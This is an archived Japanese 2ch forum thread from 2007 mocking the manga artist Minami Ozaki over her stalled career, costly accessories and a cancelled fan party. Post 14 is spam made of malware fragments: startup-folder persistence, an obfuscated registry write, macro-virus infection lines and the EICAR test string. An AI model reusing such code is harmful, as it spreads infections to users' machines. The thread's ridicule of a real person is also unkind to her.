5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ΩΩΩ完売!】尾崎南28アリエナス【ナ、ナンダッテー!?】

1 :花と名無しさん:2007/01/14(日) 10:47:21 ID:/ma7Z2Co0
凡人には考えもつかない壮大なスケールでホモ漫画を描く
女豹様こと尾崎南を生暖かい目で魚血し続けるスレ28。
マーガ本誌連載は2006年5・6合併号(2/4発売)でひとまず終了。

『長らくお待たせしました。今回で終了です。
 終りではない終了です。またお逢いできる日を祈って。』

【信者(儲)】お断りでマターリsage進行。 降臨→必要情報だけゲット→ヌルー。
【公式サイト】www.kreuz-net.com/
【神が作った女豹様の略歴フラッシュ(プロジェクトX風)】
www.geocities.co.jp/SiliconValley-Oakland/9090/mehyo.html
詳細&過去ログは>>2-10の辺に。http://makimo.to/2ch/index.htmlも併用推奨。
直林は避け、信者晒しはほどほどに。「妄想叩きはスルー。」

リンクが削除されたMINAMIのログはこちら。
www.kreuz-net.com/m_m_top.htm
リンク外された長芋誕生日限定イラはここ。
www.kreuz-net.com/bd_koji.htm
「koji」部分をkw、kh、takuに入れ替えると若し、故事労、宅が出現。

前スレ
【ヴィトンは行っても】尾崎南27パーチー【儲はドタキャン】
http://comic7.2ch.net/test/read.cgi/gcomic/1161181134/



2 :花と名無しさん:2007/01/14(日) 10:47:59 ID:/ma7Z2Co0
過去ログ
Part1「あのー尾崎南の「ブロンズ」って…」
http://salad.2ch.net/gcomic/kako/985/985274149.html
Part2「尾崎南って…」
http://salad.2ch.net/gcomic/kako/991/991264550.html
Part3「尾崎南ってpart2〜世紀末雌豹様伝説〜」
http://salad.2ch.net/gcomic/kako/993/993056859.html
part4 ■尾崎 南■のこと。
http://comic.2ch.net/gcomic/kako/1018/10187/1018719182.html
part5 ■尾崎南・5〜新世紀女豹様伝説〜■
http://comic.2ch.net/gcomic/kako/1034/10343/1034334656.html
part6【女豹】バブル作家尾崎南・6【笑止腐】
http://comic.2ch.net/gcomic/kako/1043/10439/1043904665.html
part7尾崎南7【愛って】女豹様理不尽物語【なに】
http://comic.2ch.net/test/read.cgi/gcomic/1048655766/
part8尾崎南8【怒悪流で】女豹様理不尽物語【夜露死苦】
http://comic.2ch.net/test/read.cgi/gcomic/1054554859/
part9尾崎南・絶9す【endless】女豹様貢物伝説【start】
http://comic.2ch.net/test/read.cgi/gcomic/1059057627/
part10尾崎南\10レス【長芋が】女豹をマヂで許して【刺さる】
http://comic.2ch.net/test/read.cgi/gcomic/1064646885/
part11.【答えは】尾崎南をどう…すれば11【ない】
http://comic.2ch.net/test/read.cgi/gcomic/1069325321/
part12.【踊る女豹様】病気封鎖出来ません!【The尾崎南12】
http://comic4.2ch.net/test/read.cgi/gcomic/1076219381/
Part.13 【女豹様】裏切りの連載【尾崎南・13】
http://comic6.2ch.net/test/read.cgi/gcomic/1084627115/
Part.14【女豹様】ニョッキリー(゚∀゚)!!【尾崎南・14】
http://comic6.2ch.net/test/read.cgi/gcomic/1096019196/
Part.15【カリスマ】(´,_ゝ`)プ【尾崎南15】
http://comic6.2ch.net/test/read.cgi/gcomic/1099072087/


3 :花と名無しさん:2007/01/14(日) 10:50:18 ID:???0
Part.16【i-pot】('A`)クレヨ【尾崎南16】
http://comic6.2ch.net/test/read.cgi/gcomic/1103052088/
【ギリギリ】尾崎南17【汁汁】
http://comic6.2ch.net/test/read.cgi/gcomic/1109947893/
【マタ復活!】尾崎南18【マタ休載?】
http://comic6.2ch.net/test/read.cgi/gcomic/1121077721/
【大統領の!】尾崎南19【ティクビ飛ぶ!】
http://comic6.2ch.net/test/read.cgi/gcomic/1125997192/
【終わらない…】尾崎南20みかん【終われない…】
http://comic6.2ch.net/test/read.cgi/gcomic/1131282900/
【設定】尾崎南21きゃろりん☆【激変】
http://comic6.2ch.net/test/read.cgi/gcomic/1139087874/
【フォモ一族の】尾崎南22( ゚д゚)ポカーン【歩み】
http://comic6.2ch.net/test/read.cgi/gcomic/1144804632/
【ガラクタボッタクリ】尾崎南23【卒塔婆アクセ】
http://comic6.2ch.net/test/read.cgi/gcomic/1149346550/
【アソソー!】尾崎南24【ソ…アッ…!ソァァ!!】
http://comic6.2ch.net/test/read.cgi/gcomic/1153277428/
【何もかもが】尾崎南25痔【激痛】
http://comic6.2ch.net/test/read.cgi/gcomic/1155647866/
【上は長芋】尾崎南26本目【下は紫芋】
http://comic6.2ch.net/test/read.cgi/gcomic/1158340120/


4 :花と名無しさん:2007/01/14(日) 10:50:57 ID:???0
※21歳未満は自主規制しる(pink鯖801板女豹様過去ログ)

南條晃司と泉拓人でやおい★BRONZE★絶愛
http://www2.bbspink.com/801/kako/1012/10120/1012056588.html
【お股パカーン】BRONZE第2章【連載再開ハァx3】
http://www2.bbspink.com/801/kako/1028/10285/1028526272.html
【女豹様】フィストファ━━(゚∀゚)━━ック!!!!【尾崎南】
http://www2.bbspink.com/801/kako/1042/10424/1042469085.html



5 :花と名無しさん:2007/01/14(日) 10:51:32 ID:???0
よくある質問と用語集

やおい=パロディ同人誌のホモ描写…女豹サマの漫画はこれにあたりますな。
    もとは「やまなし、おちなし、いみなし」の略
ボーイズラブ(BL)=ホモを扱ったオリジナル作品
キャプテ●翼=20年ほど前に一世を風靡したサッカー漫画最大のヒット作。少年ジャンプ連載。
   (C翼)腐女子にも支持され女豹サマはじめとする多くの同人女を世に送り込んだ。
       『BRONZE』『絶愛』の元ネタはC翼のやおい本
日向●次郎=C翼のキャラ。泉宅人のパクリ元
若島●健=C翼のキャラ。南條工事のパクリ元
反町●樹=C翼のキャラ。渋谷克己のパクリ元

スレ内の簡単な用語集
【女豹様】
漫画家・尾崎南(おざきみなみ)のことを指す。代表作は『BRONZE』『絶愛』
漫画家なのに自身が熱唱するライブビデオや写真集を出しており、
そこでは血の滲んだ包帯を腕に巻き
「女豹のように」ポーズを取っていた事から、「女豹様」と呼ばれ親しまれる事になった。
(少女漫画板用語辞典より抜粋)
【毒シリーズ】
同人誌作品集「独占欲」の事。主な作品が纏まって読めるのでお得(?)
【黒い本】
同人誌「Black」の事。初代エロ総集編。因みに2代目は「B×B」
【長芋】
見たままそのまま。顔はコロコロ変わるが顎の長さは変わらない主人公その2。



6 :花と名無しさん:2007/01/14(日) 10:54:23 ID:???O
連投規制支援

7 :花と名無しさん:2007/01/14(日) 11:05:44 ID:???O
玉●浩二=安●地帯のボーカル。昔C翼同人のイメージソングを安全地帯にするのが
     大流行していた。女豹サマも昔大ファンだった。晃司の名前はここから取られている。
櫻●敦司=BUC●-TIC●ボーカル。ある日突然BUC●-TIC●ファンとなった女豹サマは
     晃司のイメージを櫻●敦司に変える。表紙絵のポーズや小道具などは
     あっちゃんの写真集やジャケットからパクっている。
川●能活=ズビロに所属するGK。元横浜マリノス所属。
     マリノス時代女豹サマがおっかけをしていた。漫画にも登場し「ぱふ」
     で似顔絵を描いていたが、おそろしいほど似ていない。サカ板での通称はテソ。相●七瀬=女豹儲の歌手。元ヤンでテレビの歌番組で女豹漫画の宣伝をしていた。
     絶愛文庫本の解説も書いている。オヒサルサイトの写真では女豹が
     デザインしたとかいうアクセサリーをつけている。

8 :花と名無しさん:2007/01/14(日) 11:07:56 ID:???O
よくある質問と解答集

Q 女豹サマは何歳なんですか。
A 1968年2月27日生まれです。

Q 「ぱぱはみゅーじしゃんままはJリーガー」って何?
A 晃司と拓人に双子の子ども晃基と拓至が生まれて夫婦生活をしているという女豹作同人誌。
   ちなみにこれは大昔のC翼同人誌「東邦理不尽物語」をキャラの名前だけ変えたもの。
   「東邦理不尽物語」とはチェリノブイリ原発の放射能を浴びて健小次にけんちとこちろ 
   という双子ができるという話。「ぱぱは〜」にはチェリノブイリは出てこない。

Q 女豹サマは何病なの?
A 今まで出てきた仮説では花粉症、更年期障害、擬態性鬱病、などと言われています。   真相不明。花粉症が有力です。

Q 尾崎南って本名なの?
A 違います。本名は●●●●● 過去スレ探してみてね。

Q 「其の也」って何なの?
A 女豹サマの公式ページで使われている誤字。「其の他」のつもりらしいけど。

Q 儲って何?
  字をばらしてみてね。信と者になる。

Q 女豹サマは同人界では伝説の人だったの?A それについてはこのスレの120から後あたりをざーっと読んでみてね。
   http://yasai.2ch.net/doujin/kako/1010/10104/1010490210.html
   過去の女性向同人全盛期の大手スレッド

9 :花と名無しさん:2007/01/14(日) 11:08:37 ID:???0
スレタイ26の由来

392 名前:花と名無しさん 投稿日:2006/08/28(月) 00:21:19 ID:???0
私も近代知本、興味本位で買いました。
ズボンのお股の所だけ破かれてヤられたらしいアケチの、メヒョのイラストと
「『必要なトコだけ』って、やらしいよね〜」という、同じくメヒョのコメントがありました。
小説の中で、オリキャラエロ双子のティンコが「ムラサキイモ」と比喩されていました。
あとエロ双子に催淫剤を入れられ意識が朦朧としたアケチがケンモチのおっさんを
双子のどっちかと間違えて縋り付いて「○○…カムイン…」と、ねだっていました。

10 :花と名無しさん:2007/01/14(日) 11:09:13 ID:???0
603 名前:花と名無しさん メェル:sage 投稿日:2006/05/18(木) 05:33:31 ID:???0
幸運を呼ぶ女豹アクセ!購入者の喜びの声をお聞きください。

横浜市 泉タクトさん(19)
このネックレスに出会うまでの僕は、両親が無理心中して
施設に預けられ、ボロアパートに住みながらバイトで生活費を稼いでいました。
ある日、インターネットでこのアクセサリーの広告を見て、このどん底の生活から抜け出したいと
藁にもすがる思いで注文してみました。
すると、届いた次の日から次々と不思議な事が!
まず、ゴミ捨て場で拾った男性から告白され、レイプされそうになりましたが、
実はこの男性、今をときめくトップアーティストだったのです。しかも超イケメン!
今ではすっかり恋人としてラブラブな関係です。
これだけでも信じられないような幸運ですが、
次に恋人の兄からレイプされたものの、なぜか未遂ということに!
ネックレスの不思議なパワーのおかげです。
その後、恋人が殺人の疑いで逮捕された時にはもうダメかと思いましたが、
「大統領のティクビだって飛ばせる」と豪語する人の出現により、幸運にも
逃亡する事ができました。
これからもこのネックレスで幸せを呼び寄せたいと思います。
本当にありがとうございました!

11 :花と名無しさん:2007/01/14(日) 11:11:08 ID:???0
以上テンプレ終了
テンプレ3は改行多いと怒られたので2つに分けたよ


12 :花と名無しさん:2007/01/14(日) 12:30:20 ID:???O

 ナデナデ  ナデナデ
     ∧_∧
 .∧_∧( ・ω・)∧_∧
 ( ・ω・)U)) (・ω・ )
 ⊃)))(´∀`)>>1 (⊂
 .∧_∧∩))((∩∧_∧
 (   )    (   )
ナデナデ ナデナデ ナデナデ



13 :花と名無しさん:2007/01/14(日) 15:37:29 ID:???0
>>1さん乙!!
なんかしばらく見なかったらスレ進んでてびっくらこいた。しかもΩ完売?
な、なんだってー!!ちょっと前スレ見て来ます。

14 :花と名無しさん:2007/01/15(月) 18:52:36 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


15 :花と名無しさん:2007/01/15(月) 19:00:30 ID:???0
>>1乙です
なんかしょっちゅうウイルス張ってく奴いるね

16 :花と名無しさん:2007/01/15(月) 19:14:57 ID:???O
>>15
立てたばかりで上がってるスレが爆撃されるみたい

17 :花と名無しさん:2007/01/15(月) 20:35:41 ID:???0
>>1
乙。

18 :花と名無しさん:2007/01/15(月) 21:11:40 ID:???0
>>1
         ∧_∧  
         (`・ω・´)   シュッ
        (つ   と彡 ./
            /  ./
           /   ./
         /    /
        /      /
      / ///   / ツツー
     /  乙   /
   /       ./

19 :花と名無しさん:2007/01/15(月) 22:02:18 ID:???0
otsu

20 :花と名無しさん:2007/01/15(月) 22:58:37 ID:???0
乙!

21 :花と名無しさん:2007/01/16(火) 00:29:46 ID:???0
1乙&即死回避カキコ

22 :花と名無しさん:2007/01/16(火) 08:12:37 ID:???0
Ωセット、見ていると可愛いく思えてくるのが不思議だ
だが、価格を見ると速攻目がすべる
全部で1000円以内なら買っても良い(ついでにお安いメール便きぼん)

23 :花と名無しさん:2007/01/16(火) 17:48:18 ID:???0
       ∧_∧
        ( ´・ω・` )
         (つ と彡 /
          /  ./
         /   ./
       /    /
      /     /
    /       /
   | ̄ ̄ ̄ ̄ ̄|
   |  ///   | ガシャン
   |  乙

24 :花と名無しさん:2007/01/16(火) 17:51:14 ID:???0
      シュッ  シュッ
        ∧∧ シュッ   シュッ
        (`・ω・) シュッ  シュッ
        (つ と彡 / シュッ
         /// /
        /乙  /
      /乙  /
     //乙  ./
   /乙 乙 /
   | |   乙 |
   |乙  ガシャーン
     ガシャーン
   ガシャーン  ガシャーン

25 :花と名無しさん:2007/01/16(火) 19:58:08 ID:???O
その1000円は、メホがあんな馬鹿丸出しの生活を維持するための糧になる罠。


26 :花と名無しさん:2007/01/16(火) 22:42:21 ID:???0
>★「ストラップ・ピンク」が完売いたしました
>ストラップ」につきましては単品買いを希望される声も多いのですが

安い物から売切れていく(´;ω;`)
メホデザインのアクセで1万円以上のやつの売れ行きは(´;ω;`)

チェーンチャームが在庫切れになったのに通販は受け付けてるってなんなんだろう。
そしてストラップ・ピンク完売後の申込みには返金と、
チェーンチャームと扱い方が違うのは何故

27 :花と名無しさん:2007/01/17(水) 04:50:24 ID:???0
ttp://comic.2ch.net/gcomic/kako/1018/10187/1018719182.html
この変わりようたるや・・・
嘆かわしいw

28 :花と名無しさん:2007/01/17(水) 12:27:47 ID:???0
クローゼットの奥からこの人の同人誌(C翼)が出てきたんで
検索したらやっぱりスレあったw
なんかいろいろすごいことがあったようでテンプレだけでお腹イパーイになりそう

29 :花と名無しさん:2007/01/17(水) 14:39:38 ID:???0
>>28
C翼当時の面白いメホタンエピソードがあったら
教えてください
   ∧_∧  
  ( ´Д` )  
  /     ヽ 
  し、__X__,ノJ 



   /´⌒⌒ヽ   
  l⌒    ⌒l  
 ⊂ (   ) ⊃ オネガイシマス!!!!
    V ̄V

30 :花と名無しさん:2007/01/17(水) 16:45:41 ID:???O
その辺の話はドジン板の過去大手スレ辺りにいけばわかるんじゃまいか?
昔ダンパに一度だけ参加したことがあったが、肝心のメホタンは取り巻きみたいな人たちの後ろでデンと構えててあまり印象に残ってない。

31 :花と名無しさん:2007/01/17(水) 18:35:35 ID:???0
流れ読まずに失礼します


やっぱ去年の誕生日パーチーは、強行したほうがよかったよね。
本当はそのパーチーで「アクセつくっちゃいましたキャハ」とか言って
2万9千円とかのをずらずらーっと並べて
集団催眠状態の儲の人たちがうっかり買っちゃうってのが
メホタンのシナリオだったと思うの。
参加者が少ないからドタキャンだなんてダーメダーメ、
コミケにドクターストップ(メホ同人より)を振り切って車椅子で登場したこともあるんだし。
もうちょっと半年前から「誕生日パーチーやるよ」って予告してれば
参加者がもう少しは多くなっただろうに。
それか、儲が少なくても、ドタキャンしない。
少ない儲に、「南先生を守りたい」と思わせるチャンスだったのに!

32 :28:2007/01/17(水) 19:07:17 ID:???0
>>29
特に儲とかじゃなかったんで提供できる話題はないかと。

フリートークの文字が小さすぎて読む気にもならなかったorz

33 :花と名無しさん:2007/01/17(水) 21:47:14 ID:???0
>>31
本当にね。
あのドタバタで目が覚めた…と言うか見限った人、多いと思う。
あんな強行日程でも参加しようとしてた人も居たのに

34 :飲み屋:2007/01/17(水) 22:19:44 ID:???0
春の誕生日パーティードタキャン騒動で冷めはじめて
夏コミ新刊のあとがき?で完全に脱儲した人が結構いるんじゃないかと…

35 :花と名無しさん:2007/01/18(木) 01:15:13 ID:???0
新刊あとがきにそんな厄落としな効能を持たせるとは…さすがメフョ。

…すんません、ナマ言いました。
新刊あとがきにはどげな呪文があったとですか。

36 :花と名無しさん:2007/01/18(木) 17:34:02 ID:???0
人づてに知ったけど「今後アクセサクルとなっても苦情は受け付けな〜い」と
あったそうです・・一気に儲者が離れ、今では皆さんマッタリ公式HPを眺めている状態

37 :花と名無しさん:2007/01/18(木) 17:41:49 ID:???0
36じゃないけど「私はマーガで描いててもプロだったつもりはない」というような発言もあったらしい。
冗談抜きでファンの人に同情した。本当に目豹は馬鹿だよ。


38 :花と名無しさん:2007/01/18(木) 17:44:04 ID:???0
HPが生きる糧・・・・
メホたんこの板見てたら、ハロワに行った方がいいよ。

まあ、行く訳ないだろうけど・・・・

一度吸った蜜は甘いのだろうが、
HPのスタッフに見限られる前に就職お勧めしとくよ。

39 :花と名無しさん:2007/01/18(木) 20:57:16 ID:???0
>>37
それは昔からそこら中で言い(書き)まくってたよ
商業誌は本業じゃない、本業は同人だ、とか
マーガは規制があって面倒だとか
プロじゃないは言いまくってた
今思えば、プロじゃないのに売れ売れの自分カコイイ!ってのと、
物語が作れない免罪符のつもりだったのかな。
見苦しい人だと思ったよ。
嫌いな食べ物自慢とかも、いい歳こいて本当にみっともない。

40 :花と名無しさん:2007/01/18(木) 22:01:08 ID:???0
今更だけどメヒョウって上辺だけの人って感じがする。
家賃が高いマンソンに住んでるアテクシ!カコイイ!!
ヘラーリに乗ってるアテクシ!カコイイ!!
他人の目に映る自分の姿ばかり気にしてるって言うか・・・。
だからとてもじゃないけど、車好きな人にはみえない。
アクセデザイナーなんて言い始めたのもセレブごっこに混じる為に
「漫画家」なんて肩書きよりメヒョウ的には魅力があったからだとオモ。
そのアクセだった購入対象は漫画描いてた頃の遺産である儲の人達
ばかりだけどね。

41 :花と名無しさん:2007/01/18(木) 22:06:35 ID:???0
>39
多分、同じ内容のことを書いていたとしても
昔のように熱のこもった(勘違いと勢いだけでも)本を何冊も出しているときと
グダグダの話と絵でろくな作品を描きもしないでボタクリアクセでごまかそうとする今とでは
儲の受け止め方は大きく違うんじゃない?

>今思えば、プロじゃないのに売れ売れの自分カコイイ!ってのと、
>物語が作れない免罪符のつもりだったのかな。
ホント、見苦しいし、まさにいい年してみっともない。
二十歳の頃ならともかく、
本人も受け止める側もオトナの年齢なんだからそりゃ見限られるわ。




42 :花と名無しさん:2007/01/18(木) 22:30:54 ID:???0
コンスタントに連載してる時なら「私はプロじゃなく同人家」って台詞も
考え方によっては「売れ線ではなく自分の描きたいものを描くからね」という
カッコいい宣言だったのかもしれないね。

今となってはただの言い訳だけどさ。

43 :花と名無しさん:2007/01/18(木) 22:34:56 ID:???O
体の贅肉は鍛えればおとせるが、心の贅肉はなかなか落ちないって、昔読んだ本に書いてあった。
儲の賛辞と贅沢になれきったメホタンはもはや完全に破滅するまで現実をうけいれないんだろうな。

44 :花と名無しさん:2007/01/19(金) 00:03:55 ID:???0
ヤンキーの成り上がり→落ちぶれ途中体現乙ってとこだろ
いつまでも自分自身に付加価値アリとかおもってんじゃないよ
もうすぐ39歳ですよ介護保険は目前だぞ

45 :花と名無しさん:2007/01/19(金) 06:09:43 ID:???0
アクセの売れ行きの悪さにメヒョタンは落ち込んでいるかも試練
もう破壊的に絵がダメだし、マーガも見放したんじゃないかな
儲者も「ダンパのキャンセルは体調ではなく人集まりの悪さのドタキャン」と「いきなりのボタクリアクセ」で
ほとんど離れた感じだし、本は買うけどアクセはいらね。って友人も言ってたよ。
堕ちたアイドルでもスポットライトの眩しさが忘れられないから、再帰を狙うらしいが殆どムリ
メヒョタンこの先、どうするか本気で考えないと私らの方が怖いんですけど(ノд`)・゚・。

46 :花と名無しさん:2007/01/19(金) 12:42:10 ID:???0
目が滑りまくりますね

47 :花と名無しさん:2007/01/19(金) 13:55:10 ID:???0
>>46
メヒョタン乙。

48 :花と名無しさん:2007/01/19(金) 14:34:14 ID:???0
14巻の最終話が掲載されたのって去年の今頃だったっけ?
あれ、予定より一話延びたんだよね、
それであんな内容だったから儲サイトでも色々不満を読んだ覚えが。
更に誕生日パーティーが急&無理な日程で発表になって
その上、ドタキャン連絡方法がメール便ときて、
完全に儲の心が冷めていって、追い討ちかけるようにボタクリアクセ発表…でよかったっけ。

一年しか経ってないのにクリスマスプレゼントは激減しただろうし
来月のバレンタインなんてチョコなんて来るのかなあ。

49 :花と名無しさん:2007/01/19(金) 14:36:39 ID:???O
メホタンが商業デブーした年って、壁大手ドジン作家がこぞって、商業デビューした年だったよね。
出版者側はドジン作家の儲がテンテーの作品が載った本やコミックスを買ってくれるのを期待して、デビューさせたってきいたことがある。
特にメホタンは大手雑誌の看板作品のエロで売っれまくっていたから、手元に置いて牽制する意味もあったって。
要するにあなたがデビューできたのは実力じゃないですよ。
現にあなたと同じように商業デビューした作家さんで今残ってる方がどのくらいいますか?
そろそろ現実と戦いましょうよ。テンテー


50 :花と名無しさん:2007/01/19(金) 15:04:03 ID:???0
目が滑りまくりますね

51 :花と名無しさん:2007/01/19(金) 17:49:49 ID:???O
煽りがコピペなのはパクリ作家メヒョタンに倣っているのですか?

今に至っても擁護しようとする儲か本人かのレスを見ると
なんだかやさしい溜め息がもれるな

52 :花と名無しさん:2007/01/19(金) 17:53:59 ID:???0
このスレの書き込みがなくなればメホタンも気づくよ。
自分がもう誰にも認められてないって…。

35過ぎての就職は難しいだろうね…。

53 :花と名無しさん:2007/01/19(金) 18:08:33 ID:???0
>>51
どれのレスかアンカー付けてくれないとわかんない

目が滑って

54 :花と名無しさん:2007/01/19(金) 18:29:49 ID:???0
>目が滑りまくりますね
・・・の人はメヒョor儲なわけ?

>煽りがコピペ
この意味も判らないんだけど?
擁護スレなんてある??

55 :花と名無しさん:2007/01/19(金) 19:36:21 ID:???0
このスレ見て久しぶりにファンサイト巡りをしてみたが
ほとんどのところが閉鎖か404か休止中ばかり。
サイトがあっても年単位で更新されてなかったり。
やっぱり例のお誕生日騒動が効いているのか?
たとえ活動をやめた漫画家でも
良い作品を描いていれば活動しているファンサイトが結構あったりするのに。
しっかし「人が少ないからドタキャン」って、いつまで女王様気取りなんだろう。




56 :花と名無しさん:2007/01/19(金) 21:03:14 ID:???0
いまうっかりギャラリー全部覗いてしまった
80年代のドジン表紙が一番マトモじゃないか
今でも十分オバ絵ジャンルで売れそうだよメホタン

57 :花と名無しさん:2007/01/19(金) 21:25:28 ID:???0
馬鹿みたいな浪費なんかしないで普通の人が住んでる
ようなマンションか一戸建て買って、普通の人より少し
贅沢するぐらいの生活してれば多分一生遊んで暮らせたろうに。
ホント馬鹿だメヒョ。

58 :花と名無しさん:2007/01/19(金) 22:06:30 ID:???0
いつでも稼げると思っていたんだろうね。

連載再開=預貯金が危ないって思ってたよ。




59 :花と名無しさん:2007/01/19(金) 22:08:18 ID:???0
昨日、浦沢直樹先生がテレビで
「〆切があるのがプロ。〆切までに最善を尽くすのがプロの仕事」
って仰っててさぁ…

何故かメヒョの事思い出して苦い気分になったよ…
漫画家名乗るなんておこがましいにも程がある
ホント、もう消えた方が良いと思う

60 :花と名無しさん:2007/01/20(土) 02:08:18 ID:???0
35です。
新刊あとがきの内容、教えてくれた姐さん方ありがとうございます。
「自分はプロじゃね、あくまで同人作家」って読んだ時は
謙虚な姿勢だなあ、と感心したものだったけど…。

灰汁施サクルになっても苦情は…、、、って。orz
でも今の絵じゃあ逆にそうなってくれた方がハラハラせずにすみそう。
なまじ綺麗な絵を知ってたから悲しいよ…。



61 :花と名無しさん:2007/01/20(土) 02:30:46 ID:???0
>>55
ファンサイト、大きい所はほぼ全滅しました。
今のこってるサイトも、更新がすごくゆっくりだったり他の漫画に萌えてたりです。
儲でもメホの本や同人は買うけどアクセはイラネという人がほとんどです。
アクセに興味があると言ってる儲の人はほんの少ししか見たことがありません。
しかも「でもお金がないから買えない」と言ってたりして
なんかお金の使い方が正しそうです。


でも、自分、去年の夏コミの直前にどこかの儲サイトで
「アクセ新作全部買うと7万なんとか円。高いけど全部買いますよ」
と言ってる人を一人だけ見かけた記憶があるんだけど
夏コミの後で探しても見つけられません。
もしかしたら削除したか日記移動しちゃったのかな。

話もどるけど、去年の誕生日パーチードタキャンって本当に凄いドタキャンだったよね。
一ヶ月前にドタキャンじゃなくて、確か3,4日前くらいにドタキャンじゃなかったっけ?
友達どうしの10人未満のお誕生日会じゃないんだからさ。
そんで図々しくボッタクリアクセ出してくるし、儲離れを自ら加速させるメホがわけわからん

62 :花と名無しさん:2007/01/20(土) 08:56:55 ID:???0
>「アクセ新作全部買うと7万なんとか円。高いけど全部買いますよ」

サクラではなかろうか

今年はしないのかね、パーチー

63 :花と名無しさん:2007/01/20(土) 09:04:49 ID:???O
灰汁背サクルになるって言っても、まったくのオリジナルならともかく、あくまでドジン時代の儲に媚びるようなデザインで出してるあたりがどうしょもない。
どうせやるなら尾崎南のブランド捨てて、全くの別人として一からやれって言いたい。
まあ努力とか根性とか知ってたら、こんな事にはなってないか。

64 :花と名無しさん:2007/01/20(土) 11:53:54 ID:???0
なんだかんだいって、結局みんなメホタンを生温かく見つめるのは止めないんだ。

65 :花と名無しさん:2007/01/20(土) 13:03:23 ID:???0
面白いから魚血し続ける。昔ここの存在を知らなかった時に
「尾崎の面白さに誰も気が付かないのか?」って思ってた。
(勿論魚血対象として)
漫画書こうがアクセ売ろうがメヒョは面白い。
ニヤニヤ見守っていく。

66 :花と名無しさん:2007/01/20(土) 14:31:39 ID:???0
>>61
>アクセに興味があると言ってる儲の人はほんの少ししか見たことがありません。
>しかも「でもお金がないから買えない」と言ってたりして
>なんかお金の使い方が正しそうです。

この部分に和んだ。意外に冷静だな今の儲。
これが金まみれのバブルの頃の儲だと、血眼になって買うんだろうな。
これからもメホ魚血続はけるよ。
だって普通これだけの状況になったら「さてどうしようか」って悩んだりして
いろいろ変わろうと頑張るけど、それをしないで未だにあのころのまま突っ走り続けるなんて
誰にも出来ないでしょ?
自分で描いたナンシーみたいに絶頂の頃で、すべてから手を引いていたら伝説になれたのに。







67 :花と名無しさん:2007/01/20(土) 15:07:48 ID:???0
ナンシーてティンコナンシーのことか?
席?
誰?

68 :花と名無しさん:2007/01/20(土) 16:11:26 ID:???0
ナンシー関じゃないの。
確かご長寿物のコラムで「長生きすれば偉いとは限らない」というようなこと言ったんだよね。
そんで早死にした。
確かに早死にしたからこそあのコラムが伝説っぽくなってるかもね。

69 :花と名無しさん:2007/01/20(土) 17:39:20 ID:???0
なんじょうこうじって引退したんだっけ?

たしか16歳の頃に暴走族の一番えらい人で
17歳の頃にトップアイドルで、現実でウタダが300万枚とか売れてた頃に
漫画内でこうじが600万枚だか売れたんだっけか
そんで漫画の中のギャルに「なんじょうこうじってダサッと思ってたけどいいよね」とか
言われてて、漫画の中ではトップアイドル→600万枚まで2年くらいしか経ってないのに
何いってんだろうって感じだった

ああ、でも、確か泉の高校に転校してきたゴールキーパーの彼女が
「こうじ、辞めないで」とか言ってナイフで切りつけてたから
いったんソロで引退して、クロイツで復活して600万枚売ってその後グダグダ?

70 :花と名無しさん:2007/01/21(日) 14:55:45 ID:???O
↑ごめん。よくわからない

71 :花と名無しさん:2007/01/21(日) 15:17:30 ID:???O
時系列とか気にしない方が体にいいよ

72 :花と名無しさん:2007/01/21(日) 16:31:40 ID:???0
.>>62
>今年はしないのかね、パーチー

まさかこの状況でそれはない..と思いたいが
人の斜め上を行くのがメヒョタンだからな。
しかしいい年超えた大人が、お誕生日パーチーって、楽しいのかね。
今年はおとなしく今話題のあのレストランで
店員に囲まれて「はぴばすでー」でも歌って貰ったら良いと思う。
(そのサービス今もやってるかどうかは知らないが)


73 :花と名無しさん:2007/01/21(日) 17:03:53 ID:???0
三十代最後の記念パーチーやってくれんかねメッヒョ
去年の分もあわせて豪華に!魚チャの期待も
儲のなけなしの愛情も斜めにぶっ飛ばす勢いで
激しく踊って欲しいよ


20年前の今頃は凄かったのにね…。

74 :salon ◆y0izD0axK2 :2007/01/22(月) 01:27:48 ID:???0
>>68
ナンシーさんのエッセイは元から才気溢れていて常人にない視点と優しさがあった。
別に早死にされた(もしくはそれを予言したから)から伝説になったわけじゃない。
浦沢先生と同じくプロ中のプロと、寝太郎メホをいっしょくたにしてくれるな。

75 :花と名無しさん:2007/01/22(月) 08:25:22 ID:???0
寝太郎メホ!!バロスwwwwwww

>>74 モチツケ
受け取り方は人それぞれだからな。
書かれていることをそのまま鵜呑みにはしないよ。
まともな人間なら。

76 :花と名無しさん:2007/01/23(火) 09:15:05 ID:???0
 ___.                     ∩゛     ∧空∧    ((( )))   /   |.| ヽ.
  /. ――┤. -=・=-    -=・=-    | |  ∧ ∧{´ ◎ `}____( ´∀`)   /      |.|  ヽ
 ./(.  = ,= |      ∧∧    ∧_∧  | | ( ´ー`) ):::/´∀` ;:::: \ヽ(`Д´)ノ゛ -. .__   ||  `l_
 |||\┏┓/∫    (=゚ω゚)ノ~ ( ´Д`)//  \ < .∧|∧   /::::::::::| .¶_¶  || 〈  ̄`i ||r‐'''''i| |
 V/ ∧,,∧ ∬  〜(  x)  /    ∧ /   ,一-、(´ー`)  /:::::|::::::| (ΦдΦ)/~  `--イ |ヽ-イ:|/
  || ミ,,゚Д゚ノ,っ━~~ U U   / /| <・∀・> / ̄ l⊂ヽ \/|:::::::::|::::::|  γ__ヾ/.::.    |  ./
